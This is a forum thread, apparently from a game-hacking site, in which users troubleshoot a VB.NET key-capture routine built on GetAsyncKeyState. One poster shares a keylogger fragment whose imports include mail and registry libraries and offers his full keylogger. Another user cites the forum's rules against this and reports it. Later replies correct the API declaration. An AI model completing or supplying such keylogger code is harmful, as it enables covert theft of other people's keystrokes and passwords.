Red facegetasynkeysta

Posts 1–15 of 15 · Page 1 of 1
getasynkeysta
is any one there to sort out this problem
Capture.PNG28 KB · 60 downloads
Code:
Imports System.Web
Imports System****  'The **** is (dot)IO...IDK why it bleeps it out
Imports System.Net.Mail
Imports Microsoft.Win32

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Int32) As Int16
 
Private Sub Timerkeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timerkeys.Tick
        Dim result As Integer
        Dim key As String
        Dim i As Integer
        For i = 2 To 90
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                key = Chr(i)
                If i = 13 Then key = vbNewLine
                Exit For

            End If
        Next i

I made a keylogger aswell. I can give you it if you want.
all sweet friends thanks alot for so quick reply
Quote Originally Posted by niledilta View Post
all sweet friends thanks alot for so quick reply
Thank me?
Quote Originally Posted by papadoo View Post
Code:
Imports System.Web
Imports System****  'The **** is (dot)IO...IDK why it bleeps it out
Imports System.Net.Mail
Imports Microsoft.Win32

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Int32) As Int16
 
Private Sub Timerkeys_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timerkeys.Tick
        Dim result As Integer
        Dim key As String
        Dim i As Integer
        For i = 2 To 90
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                key = Chr(i)
                If i = 13 Then key = vbNewLine
                Exit For

            End If
        Next i

I made a keylogger aswell. I can give you it if you want.
Hate to sound like a wet towel, but as-per the rules
"No posting of keyloggers, viruses or phishers."
I have to at least notify a minion of this post.
Quote Originally Posted by rileyjstrickland View Post
Hate to sound like a wet towel, but as-per the rules
"No posting of keyloggers, viruses or phishers."
I have to at least notify a minion of this post.
uhmmm... I didnt post a keylogger? That is a fragment of it. I just gave him what he needs. All I said was have made one....

And this is obviously a keylogger he is working on...
Quote Originally Posted by papadoo View Post
uhmmm... I didnt post a keylogger? That is a fragment of it. I just gave him what he needs. All I said was have made one....

And this is obviously a keylogger he is working on...
Fragment or not, keyloggers (used for anything OTHER than private PERSONAL use) are for the most part illegal.

How-ever, My post had nothing to do with the fact you posted a fragment of code, but rather the fact you were advertising your Keylogger. Just saying "I'll give you mine because herp derp," is still advertisement of software that is against the current rules of MPGH.
Quote Originally Posted by rileyjstrickland View Post
Fragment or not, keyloggers (used for anything OTHER than private PERSONAL use) are for the most part illegal.

How-ever, My post had nothing to do with the fact you posted a fragment of code, but rather the fact you were advertising your Keylogger. Just saying "I'll give you mine because herp derp," is still advertisement of software that is against the current rules of MPGH.
Okay. Wont do it again..
ur timerkeys showin error , check it again
Quote Originally Posted by papadoo View Post
I made a keylogger aswell. I can give you it if you want
These codes are illegal here
Apart from the keylogger chat, which we all already know that it is illegal.

This way to get the key presses, is kind bad.
Hotkey hooks are a real man's game
I fuuu hate keyloggers...
Make sure you declare GetAsynKeyState with the right capital letters.
Quote Originally Posted by RobinC View Post
I fuuu hate keyloggers...
Make sure you declare GetAsynKeyState with the right capital letters.
The function's name is GetAsyncKeyState, which is why the entry point isn't found when you name it "GetAsynKeyState". Nevertheless, his parameter types are wrong (VB6 declaration where Long datatypes were still 4 bytes, rather than 8).

Code:
<System.Runtime.InteropServices.DllImport("user32.dll")> _
Public Shared Function GetAsyncKeyState(ByVal vk As Integer) As UShort
End Function
Is what you're looking for.

Example;
Code:
If GetAsyncKeyState(Keys.A) And &H8000 Then
    MessageBox.Show("A")
End If
Posts 1–15 of 15 · Page 1 of 1

Post a Reply

Tags for this Thread

None

Talk with us